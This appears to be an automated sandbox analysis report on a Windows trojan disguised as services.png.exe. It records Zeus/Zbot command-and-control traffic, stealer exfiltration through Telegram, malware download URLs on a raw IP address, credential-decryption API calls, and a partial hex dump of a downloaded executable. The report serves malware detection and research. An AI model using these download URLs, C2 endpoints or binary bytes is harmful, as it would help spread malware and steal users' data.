                        2025-01-31T11:02:22.779059+010020191411Malware Command and Control Activity Detected192.168.2.449905212.224.93.93443TCP
                        2025-01-31T11:02:29.915588+010020191411Malware Command and Control Activity Detected192.168.2.449946212.224.93.93443TCP
                        2025-01-31T11:02:31.917477+010020191411Malware Command and Control Activity Detected192.168.2.449958212.224.93.93443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-01-31T11:01:49.090214+010020139761Malware Command and Control Activity Detected192.168.2.449739212.224.93.93443TCP
                        2025-01-31T11:01:49.090282+010020139761Malware Command and Control Activity Detected192.168.2.449740212.224.93.93443TCP
                        2025-01-31T11:01:50.577838+010020139761Malware Command and Control Activity Detected192.168.2.449741212.224.93.93443TCP
                        2025-01-31T11:01:52.558427+010020139761Malware Command and Control Activity Detected192.168.2.449742212.224.93.93443TCP
                        2025-01-31T11:01:54.024736+010020139761Malware Command and Control Activity Detected192.168.2.449743212.224.93.93443TCP
                        2025-01-31T11:02:18.643397+010020139761Malware Command and Control Activity Detected192.168.2.449873212.224.93.93443TCP
                        2025-01-31T11:02:19.664939+010020139761Malware Command and Control Activity Detected192.168.2.449881212.224.93.93443TCP
                        2025-01-31T11:02:20.524811+010020139761Malware Command and Control Activity Detected192.168.2.449886212.224.93.93443TCP
                        2025-01-31T11:02:20.603441+010020139761Malware Command and Control Activity Detected192.168.2.449890212.224.93.93443TCP
                        2025-01-31T11:02:21.518830+010020139761Malware Command and Control Activity Detected192.168.2.449898212.224.93.93443TCP
                        2025-01-31T11:02:22.779059+010020139761Malware Command and Control Activity Detected192.168.2.449905212.224.93.93443TCP
                        2025-01-31T11:02:29.915588+010020139761Malware Command and Control Activity Detected192.168.2.449946212.224.93.93443TCP
                        2025-01-31T11:02:31.917477+010020139761Malware Command and Control Activity Detected192.168.2.449958212.224.93.93443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-01-31T11:02:36.532895+010028033053Unknown Traffic192.168.2.449987149.154.167.220443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-01-31T11:02:37.556879+010018100081Potentially Bad Traffic192.168.2.449997149.154.167.220443TCP
                        2025-01-31T11:02:39.919801+010018100081Potentially Bad Traffic192.168.2.450010149.154.167.220443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-01-31T11:02:35.433109+010018100071Potentially Bad Traffic192.168.2.449981149.154.167.220443TCP
                        2025-01-31T11:02:36.532895+010018100071Potentially Bad Traffic192.168.2.449987149.154.167.220443TCP

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: services.png.exeAvira: detected
                        Source: http://51.21.41.165:5555/smbhost.exeoAvira URL Cloud: Label: malware
                        Source: http://51.21.41.165:5555/UIServices.exeAvira URL Cloud: Label: malware
                        Source: http://51.21.41.165:5555/smbhost.exepAvira URL Cloud: Label: malware
                        Source: http://51.21.41.165:5555/smbhost.exeyAvira URL Cloud: Label: malware
                        Source: http://51.21.41.165:5555/smbhost.exeerAvira URL Cloud: Label: malware
                        Source: http://51.21.41.165:5555/UIServices.exedAvira URL Cloud: Label: malware
                        Source: http://51.21.41.165:5555/smbhost.exeAvira URL Cloud: Label: malware
                        Source: http://51.21.41.165:5555/smbhost.exe-Avira URL Cloud: Label: malware
                        Source: http://51.21.41.165:5555/UIServices.exexAvira URL Cloud: Label: malware
                        Source: http://51.21.41.165:5555/SearchUI.exeAvira URL Cloud: Label: malware
                        Source: http://51.21.41.165:5555/UIServices.exeMicrosoftAvira URL Cloud: Label: malware
                        Source: http://51.21.41.165:5555/UIServices.exepAvira URL Cloud: Label: malware
                        Source: http://51.21.41.165:5555/smbhost.exe:5555/smbhost.exeAvira URL Cloud: Label: malware
                        Source: http://51.21.41.165:5555/smbhost.exeerOAvira URL Cloud: Label: malware
                        Source: http://51.21.41.165:5555/SearchUI.exe)Avira URL Cloud: Label: malware
                        Source: http://51.21.41.165:5555/UIServices.exe5Avira URL Cloud: Label: malware
                        Source: http://51.21.41.165:5555/smbhost.exeFAvira URL Cloud: Label: malware
                        Source: http://51.21.41.165:5555/UIServices.exe)Avira URL Cloud: Label: malware
                        Source: http://51.21.41.165:5555/UIServices.exe:Avira URL Cloud: Label: malware
                        Source: http://51.21.41.165:5555/SearchUI.exeKAvira URL Cloud: Label: malware
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exeAvira: detection malicious, Label: HEUR/AGEN.1307527
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeAvira: detection malicious, Label: TR/Spy.Gen
                        Source: C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exeAvira: detection malicious, Label: HEUR/AGEN.1307527
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\SearchUI[1].exeReversingLabs: Detection: 13%
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exeReversingLabs: Detection: 81%
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\smbhost[1].exeReversingLabs: Detection: 68%
                        Source: C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exeReversingLabs: Detection: 81%
                        Source: C:\Users\user\AppData\Local\Temp\tmp7e3ae9cd\smbhost.exeReversingLabs: Detection: 68%
                        Source: C:\Users\user\AppData\Local\Temp\tmpa49210ef\SearchUI.exeReversingLabs: Detection: 13%
                        Source: services.png.exeVirustotal: Detection: 84%Perma Link
                        Source: services.png.exeReversingLabs: Detection: 89%
                        Source: C:\Users\user\AppData\Local\Temp\tmpa49210ef\SearchUI.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\SearchUI[1].exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exeJoe Sandbox ML: detected
                        Source: services.png.exeJoe Sandbox ML: detected

                        Location Tracking

                        barindex
                        Source: Yara matchFile source: Process Memory Space: nyheukpo.exe PID: 1460, type: MEMORYSTR
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_00432B37 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,0_2_00432B37
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_00432BCB CreateFileW,CryptAcquireContextW,CryptCreateHash,ReadFile,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,0_2_00432BCB
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_00421581 CryptUnprotectData,LocalFree,0_2_00421581
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_02842B37 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,0_2_02842B37
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_02842BCB CreateFileW,CryptAcquireContextW,CryptCreateHash,ReadFile,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,0_2_02842BCB
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_02831581 CryptUnprotectData,LocalFree,0_2_02831581
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeCode function: 1_2_00432B37 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,1_2_00432B37
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeCode function: 1_2_00432BCB CreateFileW,CryptAcquireContextW,CryptCreateHash,ReadFile,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CloseHandle,1_2_00432BCB
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeCode function: 1_2_00421581 CryptUnprotectData,LocalFree,1_2_00421581
                        Source: services.png.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: unknownHTTPS traffic detected: 212.224.93.93:443 -> 192.168.2.4:49740 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 212.224.93.93:443 -> 192.168.2.4:49739 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 172.217.16.196:443 -> 192.168.2.4:49879 version: TLS 1.2
                        Source: Binary string: wkernel32.pdb source: services.png.exe, 00000000.00000003.1694689173.00000000004D7000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: nel32.pdb source: nyheukpo.exe, 00000001.00000003.2205551996.00000000006BD000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: .onel32.pdbUGP source: nyheukpo.exe, 00000001.00000003.2205551996.00000000006BD000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wkernel32.pdbUGP source: services.png.exe, 00000000.00000003.1694689173.00000000004D7000.00000004.00000020.00020000.00000000.sdmp
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_00415FF1 GetFileAttributesExW,LoadLibraryW,GetProcAddress,SHGetFolderPathW,StrCmpNIW,FreeLibrary,NetUserEnum,NetUserGetInfo,NetApiBufferFree,NetApiBufferFree,SHGetFolderPathW,0_2_00415FF1
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_02825FF1 GetFileAttributesExW,LoadLibraryW,GetProcAddress,SHGetFolderPathW,StrCmpNIW,FreeLibrary,NetUserEnum,NetUserGetInfo,NetApiBufferFree,NetApiBufferFree,SHGetFolderPathW,0_2_02825FF1
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeCode function: 1_2_00415FF1 GetFileAttributesExW,LoadLibraryW,GetProcAddress,SHGetFolderPathW,StrCmpNIW,FreeLibrary,NetUserEnum,NetUserGetInfo,NetApiBufferFree,NetApiBufferFree,SHGetFolderPathW,1_2_00415FF1
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_00414ADD FindFirstFileW,FindFirstFileW,FileTimeToSystemTime,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,Sleep,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,Sleep,FindNextFileW,FindClose,0_2_00414ADD
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_004394BB PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,0_2_004394BB
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_00439576 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,0_2_00439576
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_02849576 SHGetFolderPathW,FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,0_2_02849576
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_02824ADD FindFirstFileW,FindFirstFileW,FileTimeToSystemTime,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,Sleep,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,Sleep,FindNextFileW,FindClose,0_2_02824ADD
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_028494BB PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,0_2_028494BB
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeCode function: 1_2_00414ADD WaitForSingleObject,FindFirstFileW,FindFirstFileW,FileTimeToSystemTime,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,Sleep,FindNextFileW,FindClose,FindFirstFileW,GetTickCount,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,Sleep,FindNextFileW,FindClose,1_2_00414ADD
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeCode function: 1_2_00414A30 FindFirstFileW,1_2_00414A30
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeCode function: 1_2_004394BB PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,1_2_004394BB
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeCode function: 1_2_00439576 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,1_2_00439576
                        Source: C:\Windows\System32\sihost.exeCode function: 2_2_000001CD438BDCE0 FindFirstFileExW,2_2_000001CD438BDCE0
                        Source: C:\Windows\System32\svchost.exeCode function: 3_2_00000151A656DCE0 FindFirstFileExW,3_2_00000151A656DCE0
                        Source: C:\Windows\System32\svchost.exeCode function: 4_2_0000019E29CFDCE0 FindFirstFileExW,4_2_0000019E29CFDCE0
                        Source: C:\Windows\System32\ctfmon.exeCode function: 5_2_000001F28B4EDCE0 FindFirstFileExW,5_2_000001F28B4EDCE0
                        Source: C:\Windows\System32\ctfmon.exeCode function: 5_2_000001F28B54DCE0 FindFirstFileExW,5_2_000001F28B54DCE0
                        Source: C:\Windows\explorer.exeCode function: 6_2_0907DCE0 FindFirstFileExW,6_2_0907DCE0
                        Source: C:\Windows\System32\svchost.exeCode function: 7_2_00000221D596DCE0 FindFirstFileExW,7_2_00000221D596DCE0
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 9_2_000001ECFC69DCE0 FindFirstFileExW,9_2_000001ECFC69DCE0
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 14_2_000001D17874DCE0 FindFirstFileExW,14_2_000001D17874DCE0
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 14_2_000001D1787ADCE0 FindFirstFileExW,14_2_000001D1787ADCE0
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 17_2_0000023B6120DCE0 FindFirstFileExW,17_2_0000023B6120DCE0
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 17_2_0000023B6126DCE0 FindFirstFileExW,17_2_0000023B6126DCE0
                        Source: C:\Windows\System32\RuntimeBroker.exeCode function: 18_2_000002135E7EDCE0 FindFirstFileExW,18_2_000002135E7EDCE0
                        Source: C:\Windows\System32\ApplicationFrameHost.exeCode function: 19_2_000001F6E818DCE0 FindFirstFileExW,19_2_000001F6E818DCE0
                        Source: C:\Users\user\Desktop\services.png.exeCode function: 0_2_00433EDE GetModuleHandleW,GetProcAddress,NtQueryInformationProcess,GetLogicalDriveStringsW,QueryDosDeviceW,lstrlenW,lstrlenW,lstrcpynW,lstrcpynW,lstrcpynW,0_2_00433EDE
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeFile opened: C:\Users\user\AppData\Local\Adobe\
                        Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\

                        Networking

                        barindex
                        Source: Network trafficSuricata IDS: 2013976 - Severity 1 - ET MALWARE Zeus POST Request to CnC - URL agnostic : 192.168.2.4:49740 -> 212.224.93.93:443
                        Source: Network trafficSuricata IDS: 2013976 - Severity 1 - ET MALWARE Zeus POST Request to CnC - URL agnostic : 192.168.2.4:49739 -> 212.224.93.93:443
                        Source: Network trafficSuricata IDS: 2019141 - Severity 1 - ET MALWARE Zbot POST Request to C2 : 192.168.2.4:49740 -> 212.224.93.93:443
                        Source: Network trafficSuricata IDS: 2019141 - Severity 1 - ET MALWARE Zbot POST Request to C2 : 192.168.2.4:49739 -> 212.224.93.93:443
                        Source: Network trafficSuricata IDS: 2013976 - Severity 1 - ET MALWARE Zeus POST Request to CnC - URL agnostic : 192.168.2.4:49741 -> 212.224.93.93:443
                        Source: Network trafficSuricata IDS: 2019141 - Severity 1 - ET MALWARE Zbot POST Request to C2 : 192.168.2.4:49741 -> 212.224.93.93:443
                        Source: Network trafficSuricata IDS: 2016858 - Severity 1 - ET MALWARE Generic - POST To .php w/Extended ASCII Characters (Likely Zeus Derivative) : 192.168.2.4:49739 -> 212.224.93.93:443
                        Source: Network trafficSuricata IDS: 2016858 - Severity 1 - ET MALWARE Generic - POST To .php w/Extended ASCII Characters (Likely Zeus Derivative) : 192.168.2.4:49741 -> 212.224.93.93:443
                        Source: Network trafficSuricata IDS: 2013976 - Severity 1 - ET MALWARE Zeus POST Request to CnC - URL agnostic : 192.168.2.4:49743 -> 212.224.93.93:443
                        Source: Network trafficSuricata IDS: 2019141 - Severity 1 - ET MALWARE Zbot POST Request to C2 : 192.168.2.4:49743 -> 212.224.93.93:443
                        Source: Network trafficSuricata IDS: 2013976 - Severity 1 - ET MALWARE Zeus POST Request to CnC - URL agnostic : 192.168.2.4:49742 -> 212.224.93.93:443
                        Source: Network trafficSuricata IDS: 2019141 - Severity 1 - ET MALWARE Zbot POST Request to C2 : 192.168.2.4:49742 -> 212.224.93.93:443
                        Source: Network trafficSuricata IDS: 2016858 - Severity 1 - ET MALWARE Generic - POST To .php w/Extended ASCII Characters (Likely Zeus Derivative) : 192.168.2.4:49742 -> 212.224.93.93:443
                        Source: Network trafficSuricata IDS: 2013976 - Severity 1 - ET MALWARE Zeus POST Request to CnC - URL agnostic : 192.168.2.4:49886 -> 212.224.93.93:443
                        Source: Network trafficSuricata IDS: 2013976 - Severity 1 - ET MALWARE Zeus POST Request to CnC - URL agnostic : 192.168.2.4:49898 -> 212.224.93.93:443
                        Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.4:49898 -> 212.224.93.93:443
                        Source: Network trafficSuricata IDS: 2019141 - Severity 1 - ET MALWARE Zbot POST Request to C2 : 192.168.2.4:49898 -> 212.224.93.93:443
                        Source: Network trafficSuricata IDS: 2013976 - Severity 1 - ET MALWARE Zeus POST Request to CnC - URL agnostic : 192.168.2.4:49873 -> 212.224.93.93:443
                        Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.4:49873 -> 212.224.93.93:443
                        Source: Network trafficSuricata IDS: 2019141 - Severity 1 - ET MALWARE Zbot POST Request to C2 : 192.168.2.4:49873 -> 212.224.93.93:443
                        Source: Network trafficSuricata IDS: 2013976 - Severity 1 - ET MALWARE Zeus POST Request to CnC - URL agnostic : 192.168.2.4:49905 -> 212.224.93.93:443
                        Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.4:49905 -> 212.224.93.93:443
                        Source: Network trafficSuricata IDS: 2019141 - Severity 1 - ET MALWARE Zbot POST Request to C2 : 192.168.2.4:49905 -> 212.224.93.93:443
                        Source: Network trafficSuricata IDS: 2016858 - Severity 1 - ET MALWARE Generic - POST To .php w/Extended ASCII Characters (Likely Zeus Derivative) : 192.168.2.4:49905 -> 212.224.93.93:443
                        Source: Network trafficSuricata IDS: 2013976 - Severity 1 - ET MALWARE Zeus POST Request to CnC - URL agnostic : 192.168.2.4:49881 -> 212.224.93.93:443
                        Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.4:49881 -> 212.224.93.93:443
                        Source: Network trafficSuricata IDS: 2019141 - Severity 1 - ET MALWARE Zbot POST Request to C2 : 192.168.2.4:49881 -> 212.224.93.93:443
                        Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.4:49886 -> 212.224.93.93:443
                        Source: Network trafficSuricata IDS: 2019141 - Severity 1 - ET MALWARE Zbot POST Request to C2 : 192.168.2.4:49886 -> 212.224.93.93:443
                        Source: Network trafficSuricata IDS: 2013976 - Severity 1 - ET MALWARE Zeus POST Request to CnC - URL agnostic : 192.168.2.4:49890 -> 212.224.93.93:443
                        Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.4:49890 -> 212.224.93.93:443
                        Source: Network trafficSuricata IDS: 2019141 - Severity 1 - ET MALWARE Zbot POST Request to C2 : 192.168.2.4:49890 -> 212.224.93.93:443
                        Source: Network trafficSuricata IDS: 2016858 - Severity 1 - ET MALWARE Generic - POST To .php w/Extended ASCII Characters (Likely Zeus Derivative) : 192.168.2.4:49881 -> 212.224.93.93:443
                        Source: Network trafficSuricata IDS: 2013976 - Severity 1 - ET MALWARE Zeus POST Request to CnC - URL agnostic : 192.168.2.4:49946 -> 212.224.93.93:443
                        Source: Network trafficSuricata IDS: 2016858 - Severity 1 - ET MALWARE Generic - POST To .php w/Extended ASCII Characters (Likely Zeus Derivative) : 192.168.2.4:49886 -> 212.224.93.93:443
                        Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.4:49946 -> 212.224.93.93:443
                        Source: Network trafficSuricata IDS: 2019141 - Severity 1 - ET MALWARE Zbot POST Request to C2 : 192.168.2.4:49946 -> 212.224.93.93:443
                        Source: Network trafficSuricata IDS: 2013976 - Severity 1 - ET MALWARE Zeus POST Request to CnC - URL agnostic : 192.168.2.4:49958 -> 212.224.93.93:443
                        Source: Network trafficSuricata IDS: 2017930 - Severity 1 - ET MALWARE Trojan Generic - POST To gate.php with no referer : 192.168.2.4:49958 -> 212.224.93.93:443
                        Source: Network trafficSuricata IDS: 2019141 - Severity 1 - ET MALWARE Zbot POST Request to C2 : 192.168.2.4:49958 -> 212.224.93.93:443
                        Source: Network trafficSuricata IDS: 2016858 - Severity 1 - ET MALWARE Generic - POST To .php w/Extended ASCII Characters (Likely Zeus Derivative) : 192.168.2.4:49958 -> 212.224.93.93:443
                        Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50010 -> 149.154.167.220:443
                        Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49981 -> 149.154.167.220:443
                        Source: Network trafficSuricata IDS: 2031009 - Severity 1 - ET MALWARE StormKitty Data Exfil via Telegram : 192.168.2.4:49981 -> 149.154.167.220:443
                        Source: Network trafficSuricata IDS: 2044766 - Severity 1 - ET MALWARE WorldWind Stealer Checkin via Telegram (GET) : 192.168.2.4:49981 -> 149.154.167.220:443
                        Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49987 -> 149.154.167.220:443
                        Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49997 -> 149.154.167.220:443
                        Source: Network trafficSuricata IDS: 2044557 - Severity 1 - ET MALWARE WorldWind Stealer Sending System information via Telegram (POST) : 192.168.2.4:50010 -> 149.154.167.220:443
                        Source: unknownDNS query: name: rentry.co
                        Source: C:\Users\user\AppData\Roaming\Azockavulie\nyheukpo.exeHTTP traffic: GET /webhp HTTP/1.1 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: www.google.com Connection: Close Cache-Control: no-cache
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 5555
                        Source: unknownNetwork traffic detected: HTTP traffic on port 5555 -> 49896
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 5555
                        Source: unknownNetwork traffic detected: HTTP traffic on port 5555 -> 49914
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 5555
                        Source: unknownNetwork traffic detected: HTTP traffic on port 5555 -> 49952
                        Source: unknownDNS query: name: api.telegram.org
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\tmp49712801\UIServices.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\UIServices[1].exe, type: DROPPED
                        Source: global trafficTCP traffic: 192.168.2.4:49896 -> 51.21.41.165:5555
                        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 31 Jan 2025 10:02:21 GMTServer: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40Last-Modified: Sun, 29 Oct 2023 11:53:52 GMTETag: "2a800-608d993459400"Accept-Ranges: bytesContent-Length: 174080Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a1 67 ae bb 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 9e 02 00 00 08 00 00 00 00 00 00 4e bd 02 00 00 20 00 00 00 c0 02 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 03 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc bc 02 00 4f 00 00 00 00 c0 02 00 96 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 02 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 9d 02 00 00 20 00 00 00 9e 02 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 96 05 00 00 00 c0 02 00 00 06 00 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 02 00 00 02 00 00 00 a6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 bd 02 00 00 00 00 00 48 00 00 00 02 00 05 00 8c 36 01 00 70 86 01 00 03 00 02 00 fb 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c c3 df 8f 3c 11 bd ff 34 87 b1 23 14 56 06 77 83 64 21 f6 ae ea 92 48 41 5a d4 f4 e9 cb 91 b0 af f6 49 f6 31 fe 0b 17 da cb 0b c6 59 cd b0 54 38 44 e3 bf 63 5b db 81 ef 32 94 82 dc bc a4 15 49 18 a3 ca 67 a3 fa 83 3a fe 6d c8 00 65 80 c0 b1 cd 1f 89 87 cf a0 e4 6a 7b 55 6d 37 ff 10 39 be 4d 9a 26 2c 91 ed 43 ae 09 85 03 3a f6 5d 29 17 23 eb cb 6c ab 41 47 38 e9 42 0d ca 33 4f 29 8b a1 6e db ab 11 f6 ba 16 d5 04 d7 8d fd 11 ad d7 35 ab 29 f6 63 b8 1d b1 14 9c 61 74 69 bc f2 bf 90 32 04 b0 67 29 e2 a3 91 b8 c6 25 93 c9 f6 0f 50 bc d9 e0 37 5e c3 3c 24 c3 96 22 db e1 15 bf eb 1e 56 fb cd 97 3b b2 19 02 24 30 a5 78 43 00 3d 56 44 d2 1e 62 b9 d4 f1 80 e7 e6 c3 39 41 a3 ca 50 75 1a 7c 8e 60 c8 96 58 a4 18 f4 97 45 c8 d6 02 67 df 31 f3 de 46 89 4f 55 d0 84 a0 b4 39 3d d7 5e 74 4c 83 c4 6c 87 55 9f db 25 7f 2f 5e 7d 98 a4 d7 e0 12 3c 20 62 93 a9 96 